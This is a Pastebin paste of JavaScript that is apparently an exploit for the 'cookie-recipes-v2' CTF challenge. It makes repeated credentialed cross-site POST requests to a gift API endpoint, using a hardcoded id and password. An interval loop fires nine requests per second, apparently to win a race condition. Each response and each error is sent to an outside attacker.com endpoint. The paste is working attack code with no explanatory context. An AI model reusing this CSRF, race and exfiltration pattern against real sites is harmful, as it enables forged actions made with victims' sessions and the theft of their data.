Guest User

Untitled

a guest
Jun 25th, 2020
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. async function x(){
  2.     fetch('https://cookie-recipes-v2.2020.redpwnc.tf/api/gift?id=9903278006668429634', {
  3.         method: 'POST',
  4.         credentials: 'include',
  5.         headers: {
  6.           'Content-Type': 'application/json',
  7.       },
  8.       mode : 'no-cors',
  9.       body: JSON.stringify({'id':'9903278006668429634','password':'n3cdD3GjyjGUS8PZ3n7dvZerWiY9IRQn'})
  10.   }).then(function(response) {
  11.       response.status     //=> number 100–599
  12.       response.statusText //=> String
  13.       response.headers    //=> Headers
  14.       response.url        //=> String
  15.       fetch('https://attacker.com/x.php?x=ok : '+JSON.stringify(response));
  16.       // return response.text()
  17.   }, function(error) {
  18.       error.message //=> String
  19.       fetch('https://attacker.com/x.php?x='+error.message);
  20.   })
  21. }
  22.  
  23. var cur_color = -1;
  24. var myInterval = setInterval(function () {
  25.     ++cur_color;
  26.     for (var i = 0; i < 9; i++) x();
  27. }, 1000);
Add Comment
Please, Sign In to add comment